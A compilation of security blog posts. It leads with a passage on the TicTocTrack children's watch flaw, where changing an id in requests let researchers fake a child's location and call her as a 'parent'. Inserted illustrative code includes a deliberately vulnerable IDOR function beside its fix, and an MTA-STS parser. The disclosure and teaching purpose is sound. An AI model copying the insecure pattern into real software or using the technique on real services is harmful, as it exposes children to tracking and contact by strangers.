She's no longer playing tennis, she's now in the water somewhere off Wavebreak island. This isn't a GPS glitch; Ken has placed her four and a half kilometres away by exploiting an insecure direct object reference vulnerability in TicTocTrack's API. He's done this with my consent and only to my child, but you can see how this could easily be abused. It's not just the concept of making someone's child appear in a different location to what the parents expect, you could also have them appear exactly where the parents expect... when they're actually nowhere near there.

But these devices are about much more than just location tracking, they also enable 2-way voice communications just as you'd have on a more traditional cellular phone. This, in turn, introduces a far creepier risk - that unknown parties may be able to talk to your kids. In order to demonstrate this, I put the watch back on Elle and gave Pen Test Partners permission to contact her. Pay attention to how much interaction is required on her part in order for a stranger to begin talking to her simply by exploiting a vulnerability in the TicTocTrack service:

Even for me, that video is creepy. It required zero interaction because Vangelis was able to add himself as a parent and a parent can call the device and have it automatically answer without interaction by the child. The watch actually says "Dad" next to a little image of a male avatar so a kid would think it was their father calling them:

This is precisely what the Germans were worried about when they banned the watches outright and when you watch that video, it seems like a pretty good move on their part.

The exploits go well beyond what I've already covered here too, for example:

That link goes off to a Facebook post by an account called Travelling with Kids which very enthusiastically espouses the virtues of tracking them (it's not explicitly said, but the post appears to be promotional in nature):

The little wanderers were stoked to be going off to kids club at the Hard Rock Hotel Bali. We have complete peace of mind knowing they’re wearing their TicTocTrack watches, so they can call us at anytime and with GeoFencing we know their location.

By now, I'm sure you can see the irony in the "peace of mind" statement.

The technical flaws go much further than this but rather than covering them here, have a read of the Pen Test Partners write-up which includes details of the IDOR vulnerability. Just to put it in layman's terms, here's the discussion I had with Vangelis about it:

Being conscious that many people who don't normally travel in information security circles will read this, handling a vulnerability of this nature in a responsible fashion is enormously important. Obviously you want to remove the risk ASAP, but you also want to make sure that information about how to exploit it isn't made public beforehand. We religiously followed established best practices for responsible disclosure, here's the timeline with dates being local Aussie ones for me:

  1. Saturday 6 April: Ken first contacts me about the watch. I order one that morning.
  2. Tuesday 9 April: Watch arrives.
  3. Wednesday 10 April: I set the account up.
  4. Thursday 11 April: Elle wears the watch to tennis and we test "relocating" her.
  5. Friday 12 April: Vangelis calls her and has the discussion in the video above. Ken privately discloses the vulnerability to TicTocTrack support that night.
  6. Monday 15 April (today): TicTocTrack takes the service offline.

A couple of hours before publishing, I received a notification to the email address I signed up with as follows:


I'm in two minds about this message: on the one hand, they took the service down as fast as we could reasonably expect, within a single business day, so kudos to them on that. On the other hand, the messaging worries me in a number of ways:

Firstly, Ken didn't just "allege" that there were security flaws, he spelled it out. His precise wording was "The service fails to correctly verify that a user is authorised to access data, meaning that anyone can access any data, should they so wish". Anyone testing for a flaw of this nature would very quickly establish that changing a number in the request hands over control of someone else's account, proving the vulnerability beyond any shadow of a doubt. The word "alleged" was used 3 times in the statement and it implies that these are unsubstantiated claims; they're clearly not. Which brings me to the next point:

Secondly, it wouldn't make sense to pull down the entire service if you weren't convinced there was a serious vulnerability. Many people allege there are security flaws in services, but those services don't generally go offline until the flaws are proven. Clearly an incident like this has a bunch of downstream impact and acknowledging it publicly is not something you do on a whim. Either TicTocTrack was very confident in the accuracy of Ken's report (well beyond what "alleged" implies) or there were other factors I'm not aware of that drove them to rapidly pull the service.

Thirdly, the following statement was made without citing any evidence: "there has never been a security breach that has lead to our customer's personal data being used for malicious purposes". It's not uncommon to see a response like this following a security incident, but what it should read is "we don't know if there's ever been a security breach..." This vulnerability relied on an authenticated user with a legitimate account modifying a number in the request, and the likelihood of that being logged in sufficient detail to establish whether it ever happened is extremely low. And if you were the kind of developers to log this sort of information, you'd also be the kind not to have the vulnerability in the first place!
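To put the "changing a number in the request" flaw and the logging point above into concrete terms, here is an added example (not TicTocTrack's, Nabaya's or Pen Test Partners' code) of an object-level authorization check: the vulnerable pattern that returns any record the caller names, beside the fixed pattern that verifies the caller is a registered parent of that child and records refused attempts. The record layout, ids and function names are constructed for illustration.

```python
"""Added example, not TicTocTrack's or Pen Test Partners' code: the object-level
authorization check whose absence is an IDOR, plus the audit trail the post notes
is usually missing. Record layout, ids and function names are constructed."""
import logging
from dataclasses import dataclass, field

log = logging.getLogger("watch-api")

# Audit trail of refused requests; a real service would ship this to its SIEM.
AUDIT: list = []


@dataclass
class Child:
    child_id: int
    name: str
    location: str
    parent_ids: set = field(default_factory=set)


# Constructed sample data: two unrelated parents, one child account each.
CHILDREN = {
    101: Child(101, "Child A", "tennis court", {1}),
    102: Child(102, "Child B", "kids club", {2}),
}


class Forbidden(Exception):
    """Authenticated caller asked for a record they are not entitled to."""


def _audit(user_id: int, child_id: int, action: str) -> None:
    # Record who asked for which record and was refused; this is the evidence
    # needed later to answer "was this ever exploited?".
    entry = {"user": user_id, "child": child_id, "action": action}
    AUDIT.append(entry)
    log.warning("denied %s: user=%s child=%s", action, user_id, child_id)


def _authorize(user_id: int, child_id: int, action: str) -> Child:
    child = CHILDREN.get(child_id)
    # Same refusal for "no such child" and "not your child": the response must
    # not reveal which ids exist to a caller who only incremented a number.
    if child is None or user_id not in child.parent_ids:
        _audit(user_id, child_id, action)
        raise Forbidden(f"user {user_id} may not {action} child {child_id}")
    return child


def get_child_vulnerable(user_id: int, child_id: int) -> dict:
    """The flawed pattern: the caller is logged in, but the record is fetched
    by id alone, so any authenticated parent can read any child's location."""
    child = CHILDREN[child_id]
    return {"name": child.name, "location": child.location}


def get_child_secure(user_id: int, child_id: int) -> dict:
    """The fixed pattern: resolve the record, then verify the caller is one of
    its registered parents before returning anything."""
    child = _authorize(user_id, child_id, "read")
    return {"name": child.name, "location": child.location}


def add_parent_secure(user_id: int, child_id: int, new_parent_id: int) -> set:
    """Linking a new parent is the privileged action in the post; only an
    existing parent of that child may do it."""
    child = _authorize(user_id, child_id, "add_parent")
    child.parent_ids.add(new_parent_id)
    return set(child.parent_ids)


def is_denied(fn, *args) -> bool:
    """Helper for checks: True if the call was refused by the ownership test."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

The design point is that the check happens on every object access, not just at login, and that a refusal is written somewhere a later investigation can find it. Returning the same refusal for a missing id and for someone else's id means a caller cannot enumerate which accounts exist.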

Let's be perfectly clear - this is just one more incident in a series of similar ones impacting kids' tracking watches and Gator in particular. What's infuriating about this situation is that not only do these egregiously obvious security flaws keep occurring, they're just not being taken seriously enough by the manufacturers and distributors when they do occur. There's no finer illustration of this than the statement Ken got when speaking to an agent over in his corner of the world:

UK agent for Gator said that they didn’t have the money for security, as otherwise they couldn’t afford a staff Xmas party

Is that really where we're at? Tossing up between exposing our kids in this fashion and beers at Christmas? If you're a parent ever considering buying one of these for your kid, just remember that quote. Inevitably, cost would also have been a major driver for TicTocTrack outsourcing their development to Sri Lanka; indeed, it's something that Nabaya prides itself on:


I want to finish on a broader note than just TicTocTrack or Gator or even smart watches in general; a huge number of both the devices and services I see being marketed either directly at kids or at parents to monitor their kids are absolute garbage in terms of the effort invested in security and privacy. I mentioned CloudPets and VTech earlier on and I also mentioned spyware apps; by design, every one of these has access to data that most parents would consider very personal and, in many cases, (such as the photos older kids are often taking), very sensitive. These products are simply not designed with a security-orientated mindset and the development is often outsourced to cheap markets that build software on a shoestring. The sorts of flaws we're seeing perfectly illustrate that: CloudPets simply didn't have a password on their database and both the VTech and TicTocTrack vulnerabilities were as easy as just incrementing a number in a web request. A bunch of the spyware breaches I referred to occurred because the developers literally published all the collected data to the internet for the world to see. How much testing do you think actually went on in these cases? Did nobody even just try adding 1 to a number in the request? Because that's all Ken needed to do; Ken can count therefore Ken can hack a device tracking children. Maybe I should give Elle a go at that, her counting is coming along quite nicely...

There's only one way I'd track my kids with GPS and cellular and that's with an Apple Watch. I don't mean to make that sound trivial either because we're talking about a $549 outlay here which is a hell of a lot to spend on a kid's watch (plus you still need a companion iPhone), but Apple is the sort of organisation that not only puts privacy first, but makes sure they actually pay attention to their security posture too. As that Gator agent in the UK well knows, security costs money and if you want that as a consumer, you're going to need to pay for it.

I'll leave you with this thread I wrote up when first starting to look at the watch. It got a lot of traction and I'd like to encourage you to share it with your parenting friends on Twitter or via the one I also posted to Facebook.

Social Underground: Kids Using Google Docs as New Digital Hangout

Over the years kids have succeeded in staying one step ahead of parents on the digital front. Remember the golden days of social? Teens owned Facebook until every parent, auntie, and grandparent on the planet showed up. So, teens migrated to Instagram, Twitter, and Snapchat hoping to carve out a private patch of land for their tribe. And, according to a report in The Atlantic, the latest app these digital nomads have claimed as a covert hangout surprisingly is Google Docs.

Yes — Google Docs — that boring looking online tool many of us parents use at work to collaborate on projects. Google Docs is perfect when you think about it. The app can be accessed on a tablet, laptop, or as a phone app. It allows multiple users to edit a document at the same time — kind of like an online party or the ultimate private group chat.

To interact, kids can use the chat function or even highlight words or phrases and use a comment bubble to chat. Because teachers use the application in the classroom, kids are using Google Docs to chat during class without getting busted or dupe parents at home into thinking they are doing their homework.

Another big perk: Schools have firewalls that block social networking sites during school hours, but Google Docs is officially cleared for school use.

The Risks

As with any app, what begins as a covert, harmless chat channel between friends can get malicious quickly as more and more people are invited into a shared document to talk.

Kids can easily share videos, memes, and hurtful, joking, or inappropriate content within a Google Doc. They can gang up on other kids and bully others just as they do on any other social network. Similar to the way images disappear on Snapchat in 24 hours or on Instagram stories, the “resolve” button on the Google Docs chat function allows kids to instantly delete a chat thread if a teacher or parent heads their way or hovers too closely.

Because Google Docs live on the cloud, there’s no need to download or install a piece of software to use or access it. Any device connected to the Internet can access a Google Doc, which means kids can also use it as a digital diary without a digital trail and hide potentially harmful behaviors from parents.

10 Ways to Coach Your Kids Around Digital Safety 

  1. Know where they go. Just as you’d ask your child where he or she is going offline, be aware of their digital destinations online. Check on them during homework hours to be sure they aren’t chatting away their learning time.
  2. Check for other apps. If you’ve grounded your child from his or her smartphone for any reason, and they claim they have online homework to do, check their laptops and tablets for chat apps like Kik, WhatsApp, hidden vault apps, and of course, as we now know, Google Docs.
  3. Remember, it’s forever. Even if an image or video is “resolved” on Google Docs, deleted on Instagram or Twitter, or “vanishes” on Snapchat, the great equalizer is the screenshot. Anyone can take one, and anyone can use it to bully, extort, or shame another person anytime they decide. Remind kids of the responsibility they have with any content they share anywhere online — privacy does not exist.
  4. Sharing is caring. If your child is on Google Docs and you have a hunch they aren’t doing homework, ask them to share their document with you so you can monitor their work. Just hit the big blue “share” button and insert your email address and you will have immediate access to the homework document.
  5. Keep in touch with teachers. If your child’s grades begin to slip, he or she could be distracted at school. Ask about what apps are used in the classroom and alert the teacher if you think your child might be distracted be it with technology or anything else.
  6. Parental controls. Hey, we’re busy because we’re parents. Enlist some help in monitoring your child’s online activity with parental control software. This will help you block risky sites, limit excessive app use, and give you a report of where your kids spend most of their time online.
  7. Look for red flags. Everyone needs and desires privacy even your teen. The tough part is discerning when a teen is being private or trying to hide risky behavior. A few red flags to look for include defensiveness when asked about an app or chat activity, turning off a device screen when you come around, and getting angry when you ask to see their screen. Another sign of unhealthy app use is an increase in data use and fatigue at school from lack of sleep.
  8. Connect with other parents. Here’s the snag in the whole plan: The rules that apply to homework and devices at your house, may not apply at other people’s homes where kids often study. Bullying or inappropriate online behaviors often take place under other people’s roofs. So get intentional. Keep in touch with other parents. Find common ground on digital values before letting kids go offsite for homework time.
  9. Talk, talk, talk. Your best defense in keeping your kids safe online — be it using apps or other sites — is a strong offense. Talk with your kids often about what they like to do online, what their friends do, and address digital issues immediately.
  10. Be flexible. Parental monitoring is going to look different in every family. Every child is different in maturity, and every parent-child relationship varies greatly. Find a monitoring solution that works for your family. Coming down too hard on your kids could drive them into deeper secrecy while taking a hands-off approach could put them in danger. Try different methods until you find one that fits your family.

Remember: You won’t be able to keep your finger on everything your child is up to online, but you can still have a considerable influence by staying in the know on digital trends and best online safety practices.

The post Social Underground: Kids Using Google Docs as New Digital Hangout appeared first on McAfee Blogs.

Protect Your Privacy Spring Cleaning

I’ll be honest, my blog idea was generated from an article about spring cleaning.  Let’s face it, lots of things could benefit from spring cleaning:  homes, cars, desk drawers… How about your inbox?  Maybe the ever-growing number of presentation drafts in your documents folder?  How about the flash drive in your desk drawer?  Anything in […]

The post Protect Your Privacy Spring Cleaning appeared first on Privacy Ref Blog.

Parenting club Bounty fined £400,000 for selling users’ data

Company illegally shared 34.4m records with 39 companies, information commissioner finds

The parenting club Bounty has been fined £400,000 – one of the largest penalties possible – for sharing its data with marketing agencies without users’ permission.

Bounty offers support and advice to new parents who sign up through its website and mobile app, or are directly recruited on maternity wards. Without securing consent from those parents, the company sold their information to data brokers including Acxiom, Equifax and Sky, the Information Commissioner’s Office (ICO) said.


PCI Standards in 2019: Q&A with CTO Troy Leach


What do stakeholders need to know about PCI Security Standards in 2019? PCI SSC Chief Technology Officer Troy Leach provides an update on what to expect for changes to existing standards and a look at those in development this year.  

[INFOGRAPHIC] Why choose Seqrite MobiSMART?

Estimated reading time: 1 minute

With the lines increasingly blurring between personal and official work, enterprises are in urgent need of cybersecurity solutions which can secure such kind of communication. Seqrite’s MobiSmart offers one such solution for employees accessing mobile productivity apps on BYOD (Bring Your Own Devices) or CYOD (Choose Your Own Devices). Here’s an infographic illustrating why MobiSmart is a smart choice for your enterprise.

The post [INFOGRAPHIC] Why choose Seqrite MobiSMART? appeared first on Seqrite Blog.

Weekly Update 134


That's the second update in a row I've done on time! It's also another one with a bunch of other things in common with last week, namely commentary on yet more data breaches. It's not just the breaches in HIBP, but the ones I'm busily trying to disclose. This is really sucking a lot of time right now and frankly, well, I summed it up here earlier in the week:

But it's the right thing to do and I'm going to keep at it, even if it means loading data without the organisations involved responding (it certainly won't be the first time). I also go on a bit of a rant about devices and services targeted at monitoring kids and as I say in the video, you'll see precisely why this is such a big issue for me probably next week or the week after. Stay tuned for that one and for now, here's this week's vid:


References

  1. I've got 3 different NDC events with workshops coming up over the next month:
    1. Gold Coast
    2. Minnesota
    3. New York
  2. Knuddles got themselves a €20k fine for their breach (which is now in HIBP)
  3. I ranted on about how crazy the security and privacy implications are for a whole bunch of products and services targeted at monitoring kids (do read - and please share - that thread, here's a Facebook version of it too)
  4. Varonis is sponsoring my blog again this week and they have an excellent free course on insider threats (ok, I may be a little biased on that...)

What to Know About the New Card Production Security Assessor Program


PCI SSC is in the process of launching a new program to train and qualify security professionals to perform assessments using the Card Production Security Standards. Gill Woodcock, Senior Director of Certification Programs, provides an update on this effort and how it will improve the security of payments.

Most Promising Israeli Cybersecurity Startups for 2019

Around 450 cybersecurity companies are operating in Israel, constituting 5% of the global cybersecurity market. The cybersecurity industry was founded in Israel in the late 80s, with the establishment of several local companies that developed anti-virus software and information security products. To understand the impact of Israeli companies on the global market, we can mention a few of the well-known Israeli cyber companies: Check Point, Radware, CyberArk, Imperva.

The cybersecurity industry in Israel, which is an important part of Israel’s software industry, includes a wide range of companies that protect against cyber warfare and cybercrime. The sector includes companies that have operated in it for a long time as independent companies, together with start-up companies that were sold to foreign companies and continue to operate in Israel as development centers of the acquiring companies. In the list below we will mention the most promising Israeli cybersecurity companies for 2019. We’ve created this list to give an overview of startups that our industry needs to track and be aware of. The companies below are operating in Israel or founded by Israelis, and they are all award-winning companies. To see the full list of Israeli cybersecurity companies please check our database.

Our list of Most Promising Israeli Cybersecurity Startups for 2019

XM Cyber

In order to prevent cyber-attacks, organizations should identify in advance attack vectors that hackers will utilize to compromise their critical assets. Moreover, security holes should be remediated as soon as they are created and before attackers utilize them.

XM Cyber’s multi-award-winning breach and attack simulation (BAS) platform continuously identifies attack vectors and prioritizes remediation. The platform provides organizations with a clear understanding, at any given time, of where and how hackers will compromise their crown jewels. XM Cyber was founded by executives from the Israeli cyber intelligence community and has offices in the US, UK, Israel and Australia.


Silverfort

Corporate networks are going through dramatic changes due to IT revolutions like cloud, IoT and BYOD. With countless devices and services connected to each other without clear perimeters, users must be authenticated before accessing any sensitive resources.

Silverfort delivers strong authentication across complex corporate networks and cloud environments, without requiring any software agents, proxies or local configurations. Silverfort seamlessly enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, homegrown applications, critical infrastructure and more. Silverfort enables enterprises to prevent data breaches, comply with regulatory requirements and migrate sensitive assets securely to the cloud.


Sixgill

Cybersecurity companies often rely on manual or semi-automatic processes to gather and analyze intelligence, creating a lengthy, expensive and ineffective intelligence cycle that fails to mitigate threats.

Founded in 2014, Sixgill provides cyber threat intelligence solutions based on coverage of exclusive-access to deep and dark web sources, to enterprises around the world including Fortune 500 companies, financial institutions, and law enforcement agencies.

In 2017, Sixgill was awarded a “Top 10 Most Innovative and Promising Companies of the World” at the Netexplo/UNESCO Paris conference and was included in the Disrupt 100. In 2016, Sixgill was named one of the “Top 5 Most Innovative Companies” at CyberTech Tel Aviv.


Salt Security

Salt Security protects the APIs at the core of every SaaS, web, mobile, microservices and IoT application. Its API Protection Platform is the first patented solution to prevent the next generation of API attacks, using behavioral protection. Deployed in minutes, the AI-powered solution automatically and continuously discovers and learns the granular behavior of APIs and requires no configuration or customization to ensure API protection.

The company was founded in 2016 by alumni of the Israeli Defense Forces (IDF) and serial executives in cybersecurity and in 2019 was selected as a finalist for the RSA Innovation Sandbox.


Intezer

Intezer’s Genetic Malware Analysis technology identifies code reuse among trusted and malicious software to detect advanced cyber threats. The technology determines whether a file is trusted or malicious, while also classifying the malicious file to its relevant malware family and providing information about the level of sophistication and the threat actor behind the attack, within seconds. The company also offers a free community edition where users can detect code reuse to obtain insights about malware families and threat actors.
Fortune 500 companies leverage Intezer to automate their malware analysis and classification and reduce false positives — improving security operations and accelerating incident response. The company’s technology has provided crucial insights in several high profile cyber attacks before leading engines and government agencies, including APT28, MirageFox, NotPetya and WannaCry.

Intezer was named a Cybersecurity Excellence Awards 2019 winner for Best Cybersecurity Company and a Cyber Defense Magazine Infosec 2019 award winner for Cutting Edge Malware Analysis and Incident Response. The company was named an SC Awards USA finalist in the category of Newcomer Security Company of the Year.


Protego

Serverless applications require unique security solutions. Founded in 2017, Protego’s comprehensive SaaS solution helps organizations embrace serverless technology securely.

The Platform:

· Saves developers & DevSecOps time by automating application hardening & governance within existing pipelines.

· Provides CloudAppSec with serverless app visibility & seamless run-time security with function self protection.

Protego won the 2019 Cybersecurity Excellence Awards for Best Startup and was named a 2019 Company to Watch by SDTimes Magazine. In 2018, Protego won an Innovator Award from SC Magazine, received Frost & Sullivan’s Global New Product Innovation Award, and won most innovative initiative at the CyberTech Tel Aviv Conference.


Sepio

Sepio is disrupting the cyber-security industry by uncovering hidden hardware attacks. Sepio Prime provides security teams with full visibility into their hardware assets and their behavior in real time. A comprehensive policy enforcement module allows administrators to easily define granular device usage rules and continuously monitor and protect their infrastructure. Leveraging a combination of physical fingerprinting technology together with device behavior analytics, Sepio’s software-only solution offers instant detection and response to any threat or breach attempt coming from a manipulated or infected element.

Sepio Systems was recently awarded Frost & Sullivan’s Best Practice and Technology Leadership award for the RDM (Rogue Device Mitigation) market.


Reblaze

Founded in 2012, Reblaze is a cloud-based, fully managed protective shield for sites and web applications. Hostile traffic is blocked in the cloud, before it reaches the protected network.
Reblaze is a comprehensive web security solution, providing a next-gen WAF, DoS and DDoS protection, bot mitigation, scraping prevention, CDN, load balancing, and more.
The platform offers a unique combination of benefits. Machine learning provides accurate, adaptive threat detection. Dedicated Virtual Private Clouds ensure maximum privacy. Top-tier infrastructure assures maximum performance. Fine-grained ACLs enable precise traffic regulation. An intuitive web-based management console provides real-time traffic control. A one-month trial offer allows you to assess Reblaze with no cost, risk, or obligation.


Regulus Cyber

Regulus Cyber offers defense for sensors used in automotive, maritime and aviation systems.
It is the first company focusing entirely on sensor security solutions that protect commonly used sensors for both manned and unmanned systems. Its product, Pyramid, offers real-time protection against jamming and spoofing attacks.
These attacks can disable or hijack sensors such as GNSS, LiDAR, Radar and other mission-critical components.
Regulus Pyramid has won several awards, including first place for cybersecurity in the AUVSI Excellence awards and the Cyberstorm Startup Competition, and the company has received $6.3 million in funding from leading VCs in Israel and Silicon Valley.


Morphisec

Morphisec fundamentally changes the cybersecurity scene by shifting the advantage to defenders, keeping them ahead of attacks with moving target defense.

Emerging from the national cyber security center and from some of the sharpest cyber security minds in Israel, Morphisec provides the ultimate threat prevention by making sure attackers never find the targets they seek.

 


This was our latest list of the most promising Israeli cybersecurity startups for 2019. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Most Promising Israeli Cybersecurity Startups for 2019 appeared first on CyberDB.

D.C. Area Crypto Day – Spring 2019

D.C. Area Crypto Day is a bi-annual, one-day regional meeting of cryptographic researchers to promote research collaborations and disseminate fresh, state-of-the-art results in cryptography. Previous D.C.

You Can Now Get This Award-Winning VPN For Just $1/month

If you use the internet (which you clearly do), you likely know how important it is to protect your data in an increasingly dangerous cyber environment. But like other essential tasks that tend to be tedious (like filing taxes early and brushing your teeth for the full two minutes), installing and running a VPN can sound unappealing to many: sure, they encrypt your internet traffic and hide your location — but they can also run frustratingly slowly, delaying the way you’d usually use the internet for entertainment and work.

That’s where Ivacy VPN is different: not only will the speedy service let you browse and stream lag-free, it also offers real-time threat detection technology, removing malware and viruses at the server level. It ensures that all your downloads and devices stay totally secure, so you can stay safe online without being inconvenienced.


Gmail making email more secure with MTA-STS standard



We’re excited to announce that Gmail will become the first major email provider to follow the new SMTP MTA Strict Transport Security (MTA-STS) RFC 8461 and SMTP TLS Reporting RFC 8460 internet standards. Those new email security standards are the result of three years of collaboration within IETF, with contributions from Google and other large email providers.

SMTP alone is vulnerable to man-in-the-middle attacks

Like all mail providers, Gmail uses Simple Mail Transfer Protocol (SMTP) to send and receive mail messages. SMTP alone only provides best-effort security with opportunistic encryption, and many SMTP servers do not prevent certain types of malicious attacks that intercept email traffic in transit.

SMTP is therefore vulnerable to man-in-the-middle attacks. A man-in-the-middle attack is one where communication between two servers is intercepted and possibly changed without detection. Real attacks and prevention were highlighted in our research published in November 2015. MTA-STS will help prevent these types of attacks.

MTA-STS uses encryption and authentication to reduce vulnerabilities

An MTA-STS policy for your domain means that you request external mail servers sending messages to your domain to verify that the SMTP connection is authenticated with a valid public certificate and encrypted with TLS 1.2 or higher. This can be combined with TLS reporting, which means your domain can request daily reports from external mail servers with information about the success or failure of emails sent to your domain according to the MTA-STS policy.

Gmail is starting MTA-STS adherence. We hope others will follow

Gmail is the first major provider to follow the new standard, initially launching in Beta on April 10th 2019. This means Gmail will honor MTA-STS and TLS reporting policies when sending emails to domains that have defined these policies. We hope many other email providers will soon adopt these new standards that make email communications more secure.

Email domain administrators should set up DNS records and a web server endpoint to configure MTA-STS and TLS reporting policies for incoming emails. Use our Help Center to find out how to set up an MTA-STS policy with your DNS server. G Suite admins can use the G Suite Updates blog to see what MTA-STS means for G Suite domains.
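The DNS records and policy file the announcement refers to have a small, fixed format, so here is an added example (not Google's or the IETF's code) that shows what a receiving domain publishes for MTA-STS (RFC 8461) and TLS reporting (RFC 8460), parses both, and works through the decision a sending MTA makes from them: in enforce mode, an MX outside the policy or a failed certificate/TLS check means the message is not delivered, while testing mode still delivers and only reports. The example.com names, the policy id and the report address are constructed placeholders.

```python
"""Added example, not Google's or the IETF's code: parse the records a receiving
domain publishes for MTA-STS (RFC 8461) and TLSRPT (RFC 8460) and show the
decision a sending MTA makes from them. The example.com names, policy id and
report address are constructed placeholders."""

# Constructed TXT records as the receiving domain's DNS would publish them.
DNS_TXT = {
    "_mta-sts.example.com": "v=STSv1; id=20190429T010101;",
    "_smtp._tls.example.com": "v=TLSRPTv1; rua=mailto:tls-reports@example.com",
}

# Constructed policy file, served at https://mta-sts.example.com/.well-known/mta-sts.txt
POLICY_TEXT = """version: STSv1
mode: enforce
mx: mail.example.com
mx: *.backup-mx.example.net
max_age: 604800
"""

VALID_MODES = {"enforce", "testing", "none"}


def parse_txt_record(record: str) -> dict:
    """Split a 'k=v; k=v;' TXT record (both _mta-sts and _smtp._tls use it)."""
    fields = {}
    for part in record.split(";"):
        part = part.strip()
        if not part:
            continue
        key, sep, value = part.partition("=")
        if not sep:
            raise ValueError(f"malformed field {part!r}")
        fields[key.strip()] = value.strip()
    return fields


def parse_policy(text: str) -> dict:
    """Parse the policy file and enforce the fields RFC 8461 requires."""
    policy = {"mx": []}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed line {line!r}")
        key, value = key.strip(), value.strip()
        if key == "mx":
            policy["mx"].append(value)
        elif key == "max_age":
            policy["max_age"] = int(value)
        else:
            policy[key] = value
    if policy.get("version") != "STSv1":
        raise ValueError("version must be STSv1")
    if policy.get("mode") not in VALID_MODES:
        raise ValueError("mode must be enforce, testing or none")
    if "max_age" not in policy:
        raise ValueError("max_age is required")
    if policy["mode"] != "none" and not policy["mx"]:
        raise ValueError("at least one mx entry is required unless mode is none")
    return policy


def mx_matches(pattern: str, hostname: str) -> bool:
    """RFC 8461 section 4.1: a leading '*.' matches exactly one leftmost label,
    so '*.example.net' matches 'mx.example.net' but not 'example.net' or
    'a.b.example.net'. Otherwise the names must match exactly (case-insensitive)."""
    p, h = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if p.startswith("*."):
        suffix = p[1:]  # ".example.net"
        if not h.endswith(suffix):
            return False
        leftmost = h[: -len(suffix)]
        return bool(leftmost) and "." not in leftmost
    return p == h


def sender_should_deliver(policy: dict, mx_host: str, tls_ok: bool) -> bool:
    """A sending MTA's decision for one MX: tls_ok is the result of its own
    TLS 1.2+ handshake and certificate validation. In enforce mode, an MX
    outside the policy or a failed validation means do not deliver; in testing
    and none modes it still delivers (and reports the failure via TLSRPT)."""
    in_policy = any(mx_matches(p, mx_host) for p in policy["mx"])
    if policy["mode"] == "enforce":
        return in_policy and tls_ok
    return True


def tlsrpt_destinations(record: str) -> list:
    """Addresses (mailto: or https:) that daily TLS reports should go to."""
    rua = parse_txt_record(record).get("rua", "")
    return [u.strip() for u in rua.split(",") if u.strip()]
```

A practical sequence for a domain owner is to publish the policy in testing mode with TLSRPT first, watch the daily reports for MX hosts or certificates that would fail, and only then switch the mode to enforce and bump the id in the _mta-sts TXT record so senders refetch the policy.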

5 Most Common Types of Threats You Need to Know About

Cyber threats sometimes feel unrelenting and are becoming more dangerous every day. While the internet presents users with lots of information and services, it also includes several risks. Cyberattacks are increasing in sophistication and volume, with many cybercriminals using a combination of different types of attacks to accomplish a single goal. Though the list of potential threats is extensive, below you’ll see the most common security threats you should look out for.

1. Malware

Short for “malicious software,” malware comes in several forms and can cause serious damage to a computer or corporate network. There are various forms of malware ranging from viruses and worms to Trojans and beyond. Malware is often seen as a catch-all term that refers to any software designed to cause damage to a computer, server, or network.

Antivirus software is the best-known product for protecting your personal devices against malware and is a great start to prevent potential threats. For enterprises, protecting your endpoints is essential to quickly detect, prevent, and correct advanced threats to your business.

2. Computer Worm

The distinctive trait of a worm is that it can self-replicate and doesn’t require human interaction to create copies and spread quickly and in great volume. Most worms are spread through tricking internet users and are designed to exploit known security holes in software. Since many employees use their phones for work-related tasks when they are not within the perimeter of their corporate firewall, businesses are at a high risk for potential worms. If a machine is infected, the worm can corrupt files, steal sensitive data, install a backdoor giving cybercriminals access to your computer, or modify system settings to make your machine more vulnerable.

3. Spam

Spam refers to unsolicited messages in your email inbox. From the sender’s perspective, spam is a great way to get their message across in an efficient and cost-effective way. While spam is usually considered harmless, some can include links that will install malicious software on your computer if the recipient clicks on it.

How do you recognize malicious spam? First off, if you don’t recognize the sender’s address, don’t open it. Also, if the email addresses you in a generic way, i.e. “Dear customer”, “Hi there” etc., don’t engage. Be aware of embedded links and check for odd URLs by hovering over them to see where they want to direct you and whether the destination URL matches the site you expect.

4. Phishing

Created by cybercriminals attempting to solicit private or sensitive information, phishing schemes tend to be the starting point of nearly all successful cyberattacks. Phishing schemes can disguise themselves in many forms, whether it's posing as your bank or a common web service, with the sole purpose of luring you into clicking links and asking you to verify account details, personal information, or passwords. Many people still associate phishing threats with emails, but the threat has evolved beyond your inbox. Hackers are now employing text messages, phone calls, phony apps, and social media quizzes to trick an unwitting victim.

5. Botnet:

Botnet malware is a network of computers that have been hijacked or compromised, giving hackers the ability to control infected computers or mobile devices remotely. When the malware is launched on your computer or mobile device, it recruits your infected device into a botnet, and the hacker is now able to control your device and access all your data in the background without your knowledge.

A botnet can consist of as few as ten computers or hundreds of thousands, and when bots come together, they are a force to be reckoned with. If a botnet hits your corporate website, it can make millions of requests at once, overloading the servers and knocking the website offline, slowing web traffic, or degrading performance. As many businesses are aware, a website that is offline or has a long lag time can be very costly, resulting in a loss of customers or a damaged reputation.


For more information check out our Security Awareness Resources and Reports.

The post 5 Most Common Types of Threats You Need to Know About appeared first on McAfee Blogs.

Upcoming cybersecurity events featuring BH Consulting

Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy. 

Tech Connect Live 2019: Dublin, 30 May

BH Consulting COO Valerie Lyons will be presenting at this event which takes place at the RDS in Dublin on Thursday 30 May. The conference is a business and technology event, with talks on a range of related subjects happening throughout the day. The event is free to attend, and more than 5,000 delegates are expected on the day. To find out more and to register for a free pass, visit here

Data Protection Officer certification course: Vilnius/Maastricht June/July

BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here

IAM Annual Conference: Dublin, 28-30 August

Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page. 

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

On World Health Day, Give Your Children the Key to Good Digital Health

